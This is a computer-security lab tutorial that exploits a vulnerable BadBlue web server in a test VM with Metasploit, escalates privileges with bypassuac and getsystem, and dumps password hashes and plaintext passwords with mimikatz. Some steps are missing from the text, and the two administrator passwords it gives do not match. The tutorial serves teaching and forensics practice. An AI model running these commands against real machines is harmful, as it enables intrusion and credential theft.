(Metasploit:
CVE-2007-6377)

Although companies are starting to do a
better job in keeping server software inventories, more often than not,
employee workstations are often forgotten about. This is a
sigificant
attack vector, because some employees might install file sharing software that has a
known vulnerabilities.

For example, BadBlue is a easy to use Web
Server that can reside on the employees workstation that provides file
sharing functionality. Unfortunately, it has several known
vulnerabilities, that include, but are not limited to: buffer
overflow, command injection and cross-site scripting vulnerabilities.

Imagine that the employee is on a public
wifi and is also connected to their company network. A web server
with a known vulnerability could serve as a staging area to take over the
machine and capture multiple passwords and more.

What is the BadBlue 2.72b PassThru Buffer
Overflow Exploit?

Per
CVE-2007-6377, A stack-based buffer overflow in the PassThru
functionality in ext.dll in BadBlue 2.72b and earlier, allows remote
attackers to execute arbitrary code via a long query string.

What is Metasploit?

The Metasploit Framework is a open source
penetration tool used for developing and executing exploit code against
a remote target machine. The Metasploit framework has the world's
largest database of publicly tested exploits. In simple words, Metasploit
can be used to test the Vulnerability of computer systems in order to
protect them and on the other hand it can also be used to break into
remote systems.

Special thanks goes out the Founder of
Metasploit, HD Moore (@hdmoore).

What is mimikatz?

Mimikatz is a tool that pulls plain-text
passwords out of WDigest interfaced through LSASS. WDigest is a
DLL first added in Windows XP that is used to authenticate users against
the HTTP Digest authentication and Simple Authentication Security Layer
(SASL) exchanges. Both of these require the user's plain-text password
in order to derive the key to authenticate, thus why it is stored in
plain-text.

Special thanks goes out to the mimikatz
author, Benjamin DELPY (@gentilkiwi),
for his game-changing work.

I wanted to thank my good friend Carlos
Cajigas (@carlos_cajigas)
for creating LosBuntu and for his generous guidance and mentorship in
Cyber Forensics.

LosBuntu
is a Linux Live DVD distribution (distro) that can be used to assist in
data forensic investigations. It is a compilation of Master Cajigas'
many years of experience as a former law enforcement agent and IBM
forensics investigator.

As a condition of your use of this Web
site, you warrant to computersecuritystudent.com that you will not use
this Web site for any purpose that is unlawful or
that is prohibited by these terms, conditions, and notices.

In accordance with UCC § 2-316, this
product is provided with "no warranties, either express or implied." The
information contained is provided "as-is", with "no guarantee of
merchantability."

In addition, this is a teaching website
that does not condone malicious behavior of
any kind.

You are on notice, that continuing
and/or using this lab outside your "own" test environment
is considered malicious and is against the law.

Note(FYI):
LosBuntu will be used later to forensically collect a memory snapshot of the
BadBlue Metasploit Attack Vector.

Open VMware Player on your windows machine.

Instructions:

Click the Start Button

Type "vmware player" in the search box

Click on VMware Player

Edit Virtual Machine Settings

Instructions:

Select LosBuntu

Click Edit Virtual Machine Settings

Configure Memory

Instructions:

Click on Memory.

Up the memory to 1 GB

Note(FYI):

LosBuntu really needs 1.5 to 2 GB;
however, you will have 3 Virtual Machines running at the same time.
You are just using LosBuntu to collect memory for this lesson.

Do NOT
Click the OK Button, we still have more to configure.

Configure CD/DVD(IDE)

Instructions:

Click on CD/DVD(IDE)

Device status: Check Connect at
power on

Connection: Click Use physical drive

Select Auto detect

Note(FYI):

Do NOT
Click the OK Button, we still have more to configure

Configure Network Adapter

Instructions:

Click on Network Adapter

Device status: Check Connect at
power on

Network Connection: Click NAT: Used
to share the ....

Click the OK Button

Note(FYI):

We will
use NAT instead of bridged,
because of multiple VMware Player issues with Windows 7 not
acquiring an IP Address when using a Wireless connection. In
order to dump the memory, Kali, Damn Vulnerable Windows 7, and
LosBuntu will use NAT.

Play LosBuntu Virtual Machine

Instructions:

Select LosBuntu

Click Play virtual machine

Section 2: Login to LosBuntu

Login to LosBuntu

Instructions:

Password: mtk

Press <Enter>

Open Terminal Windows

Instructions:

Click on the Terminal Window

Become root

Instructions:

sudo su -

password: mtk

pwd

Note(FYI):

Command #1, Use (sudo su -) to simulate
an initial root login where the /etc/profile, .profile and .bashrc
are executed. Not only will the root user's environment be present,
but also the root user will be placed in it's own home directory
(/root).

Command #2, Use (pwd) to display the
current working directory of the particular user.

Obtain IP Address

Instructions:

ifconfig -a

Record Your IP Address

Note(FYI):

Command #1, Use (ifconfig) to view all
(-a) IP Addresses associated with LosBuntu. You should only have
two interfaces: eth0 and lo.

eth0 - Is the primary interface.
In my case, the IP Address is
192.168.121.203.

lo - Is the local loopback
address. The loopback address is used to establish an IP
connection to the same machine or computer being used by the
end-user. The loopback construct gives a computer or device
capable of networking the capability to validate or establish
the IP stack on the machine.

If your host machine has Internet
Connectivity, but LosBuntu does not have an IP Address associated
with eth0, then issue the following command as root.

dhclient -v

Section 3: Configure Samba

Create Forensics Directory (On
LosBuntu)

Instructions:

mkdir -p /forensics/badblue

chown -R mtk:mtk /forensics

chmod -R 770 /forensics

ls -ld /forensics/badblue

Note(FYI):

Command #1, Use (mkdir) to create the
(/forensics/badblue) directory, and use the (-p) to suppress errors
if the directory already exists.

Command #2, Use (chown) to change the
user and group ownerships to mtk for user and mtk for group for the
(/forensics) directory and all underlying directories and files.

Command #3, Use (chmod) to set the
read/write/execute permissions for both user and group for the
(/forensics) directory and all underlying directories and files.

Command #4, Use (ls) with the flags
(-ld) to list the (/forensics/badblue) directory listing.

Open Samba Configuration File

Instructions:

cd /etc/samba

cp smb.conf smb.conf.BKP

gedit smb.conf > /dev/null &

Note(FYI):

Command #1, Use (cd) to enter the
(/etc/samba) directory.

Command #2, Use (cp) to make a backup
copy of the samba configuration file (smb.conf).

Command #3, Use (gedit) to open the (smb.conf)
file from command line. Use the redirect operator (>) to send
standard error into a black hole (/dev/null).

Open Samba Preference

Instructions:

Click Edit

Select Preferences

Display Line Number

Instructions:

Check Display lines numbers

Click the Close Button

Add Forensics Directory

Instructions:

Scroll Down to line
262

Append
forensics/badblue
to the end of the slash /

Note(FYI):

Command #2, Line 262 should look like
the below.

path
= /forensics/badblue

Save File

Instructions:

File --> Save

Quit gedit

Instructions:

File --> Quit

Restart the Samba Service

Instructions:

service smbd restart

Note(FYI):

Command #1, Use (service) to restart
the samba (ie. smbd) service.

Section 4: Start
your Windows 7 VM

Open VMware Player on your windows machine.

Instructions:

Click the Start Button

Type "vmware player" in the search box

Click on VMware Player

Edit Virtual Machine Settings

Instructions:

Click on Damn Vulnerable Windows 7

Click on Edit virtual machine
settings

Configure CD/DVE(IDE)

Instructions:

Select CD/DVD (IDE)

Click on the Use physical drive:
radio button

Select Auto detect

Note(FYI):

Do not click on the OK
Button

Configure Memory

Instructions:

Select Memory

Click on "512
MB"

Note(FYI):

Temporarily lower the amount of memory
to 512 MB to limit the size of the
memory dump file that we will
later analyze in a subsequent lesson.

Configure Network Adapter

Instructions:

Select Network Adapter

Click the radio button "NAT:
Used to share the host's IP address"

Click the OK button

Note(FYI):

We will use NAT instead of bridged,
because of multiple VMware Player issues with Windows 7 not
acquiring an IP Address when using a Wireless connection.

Start Damn Vulnerable Windows 7

Instructions:

Click on Damn Vulnerable Windows 7

Click on Play virtual machine

Section 5: Login to
Windows 7

Select Login User

Instructions:

Click on Security Student

Note(FYI):

Security Student does belong to the
Administrators group.

Login as Security Student

Instructions:

Supply the student password (abc123).

Click on the arrow

Section 6: Verify you have a Network IP Address

Bring up Command Prompt

Instructions:

Click the Windows Start Button

Type
cmd in the
search box

Right Click on cmd

Select Run as administrator

Note(FYI):

It is imperative that you open the cmd
as the administrator. We will later use this command terminal
to set the Administrator password.

User Account Control

Instructions:

Click on the Yes Button

Record IP Address

Instructions:

ipconfig

Record your IP Address

Notes(FYI):

In my case, my IP Address is
192.168.121.172.

In your case, your IP Address will
probably be different.

Create BadBlue Forensics Directory

Instructions:

mkdir Z:\badblue

dir Z:\badblue

Notes(FYI):

The Z: Drive represents a "virtual"
thumb drive that you created and attached in the previous
Metasploit: MS12-020 lesson. Obviously, a Forensics
investigator would/could use write blocker with a real thumb drive
and more.

Change Administrator's Password

Instructions:

net users administrator Try2H4ckMe!

Notes(FYI):

Command #1, Change the administrator
password to (Try2H4ckMe!).
This looks like a difficult password to crack, but you will soon be
amazed using the the magic of mimikatz.

Section 7: Configure
Firefox

Open Firefox (On
Damn Vulnerable Windows 7)

Instructions:

Click the Windows Start Button

Search for
firefox

Click Mozilla Firefox

Firefox Options

Instructions:

Click on Tools

Select Options

File Save Location

Instructions:

Click on General

Click on Always ask me where to save
files

Click the X to closes the
Options Tab.

Note(FYI):

This will allow you to specify the
download directory when saving files.

We will save WinPMEM on the FORENSICS (Z:)
Drive, which acts as our virtual thumb drive. You should
not save or download your memory acquisition tool the (C:) Drive.

Section 9: Start BadBlue

Start BadBlue (On
Damn Vulnerable Windows 7)

Instructions:

Right Click on the BadBlue
Icon

Select Open

Minimize BadBlue

Instructions:

Minimize BadBlue

Close BadBlue Webpage

Instructions:

Click File

Select Exit

Section 10: Switch
User to Administrator

Switch User (On
Damn Vulnerable Windows 7)

Instructions:

Click the Start Button

Click the Arrow ()
Next to Shutdown

Click Switch user

Note(FYI):

We are switching users instead of logging
out to simulate a Windows Server having multiple users logged into a
system during an attack.

Login as Administrator

Instructions:

Click on Administrator

Provide Password

Instructions:

Supply the Administrator
password (Try2H4ckM3!).

Click on the arrow

BadBlue Error

Instructions:

Click the OK Button

Note(FYI):

This error occurred because BadBlue was
already started by the student user.

Minimize BadBlue

Instructions:

Minimize BadBlue

Section 11: Configure Kali Virtual Machine Settings

Open VMware Player on your windows machine.

Instructions:

Click the Start Button

Type "vmware player" in the search box

Click on VMware Player

Edit Virtual Machine Settings

Instructions:

Click on Kali

Edit Virtual Machine Settings

Note:

Before beginning a lesson it is
necessary to check the following VM settings.

Configure CD/DVD

Instructions:

Click on CD/DVD (IDE)

Click on the radio button "Use
physical drive:"

Select Auto detect

Set Network Adapter

Instructions:

Click on Network Adapter

Click the radio button "NAT: Used to
share the host's IP Address"

Click the OK Button

Note(FYI):

We will
use NAT instead of bridged,
because of multiple VMware Player issues with Windows 7 not
acquiring an IP Address when using a Wireless connection. In
order to dump the memory, Kali, Damn Vulnerable Windows 7, and LosBuntu
will use NAT.

Section 12: Play and Login to Kali

Start Up Kali

Instructions:

Click on Kali

Play virtual machine

Supply Username

Instructions:

Click Other...

Username: root

Click the Log In Button

Supply Password

Instructions:

Password: <Provide your Kali root
password>

Click the Log In Button

Open a Terminal Window

Instructions:

Click on Applications

Accessories --> Terminal

Obtain Kali's IP Address

Instructions:

ifconfig

Record your IP Address

Note(FYI):

Command #1, Is used to display Kali's
IP Address.

Command #2, Record Your IP Address.

Mine is
192.168.121.207.

Your will probably be different.

If your host machine has Internet
Connectivity, but Kali does not have an IP Address associated
with eth0, then issue the following command as root.

dhclient -v

Section 13: Start
Typescript

Start A Typescript

Instructions:

script /root/bad_blue.txt

Notes(FYI):

Command #1, Use (script) to make a typescript of
the terminal session. It is
useful for students who need a hardcopy record of an interactive
session as proof of an assignment. Basically all input and output
will be stored in the file (bad_blue.txt). It can helpful for
trouble shooting purposes.

Command #1, Use (nmap) to scan (Damn
Vulnerable Windows 7 VM). Use the (-p) flag to scan port
http/80 and use (-sV) to display the version.

Section 15: It's
Metasploit Time

Start msfconsole

Instructions:

msfconsole

Note(FYI):

Command #1, The msfconsole provides an
"all-in-one" centralized console and allows you efficient access to
virtually all of the options available in the MSF.

Your banner picture will probably be
different. To change the picture, just type the word banner.

Search for BadBlue

Instructions:

search badblue

use exploit/windows/http/badblue_passthru

Note(FYI):

Command #1, The (search) command allows
the user to search the module names and descriptions for the string
(badblue).

Command #2, The (use) command allows
the user to set/use the particular module.

BadBlue Info

Instructions:

info

Notice we will have to set the RHOST
(the target address)

Note(FYI):

Command #1, The (info) commands allows
the user to display information about the particular module.
It also allows the user to see which options are required to be set
before implementing the specific attack vector.

Command #2, Use (background) to place
the meterpreter session in the background, which allow you to
additionally load the bypassuac
module.

Command #3, Use (sessions) to display
the meterpreter session we placed in the background.

Send UAC Bypass

Instructions:

use exploit/windows/local/bypassuac

show options

set SESSION
1

"1"
as in the number one.

exploit

Note(FYI):

Command #1, This is a post-exploitation
module that Escalates the UAC (User Account Control) Protection
Bypass.

Command #2, Show options. Notice the
SESSION variable needs to be set.

Command #3, Set the SESSION variable to
Meterpreter session 1.

Command #4, Exploit away. Notice
the stage being sent and creation of a new meterpreter connection.

Get SYSTEM

Instructions:

getuid

getsystem

getuid

Note(FYI):

Command #1, Use (getuid) to display the
username. Notice the username is student.

Command #2, Use (getsystem) to escalate
the the user privilege of the current session to the SYSTEM (aka
administrator) account. This is why your general user account
should not have administrative privileges.

Command #3, Notice the username is now
SYSTEM, which has Administrator privileges.

Section 16: It's Mimikatz Time

Load mimikatz

Instructions:

load mimikatz

mimikatz_command -f version

help mimikatz

Note(FYI):

Command #1, Use (load mimikatz) to load
the Mimikatz module into memory.

Command #2, Display the mimikatz
version.

Command #3, Display the Mimikatz module
commands and descriptions.

msv credentials

Instructions:

msv

Note(FYI):

Command #1, Use msv to display the msv
credentials.

Notice the use of NTLM. NTLM is a
suite of authentication and session security protocols used in
various Microsoft network protocol implementations. It is best
recognized as part of the "Integrated Windows Authentication", which
means there is the potential to retrieve the clear text password if
that particular user is logged into the system during the attack.

Mimikatz Native Features

Instructions:

mimikatz_command -f fu::

Note(FYI):

Command #1, Display a complete list of
the available modules. This is the native way of running
mimikatz. Notice here you have the ability to see processes,
drivers, samdump and more.

Mimikatz Samdump

Instructions:

mimikatz_command -f samdump::

Note(FYI):

Command #1, Display the samdump
options.

Mimikatz Samdump Hashes

Instructions:

mimikatz_command -f samdump::hashes

Note(FYI):

Command #1, Display the SAM Database
Hashes.

Mimikatz Wdigest

Instructions:

wdigest

Note(FYI):

Command #1, Use the mimikatz metasploit
module (wdigest) to display all the passwords of users that are
currently logged into the server. (Are you scared yet?).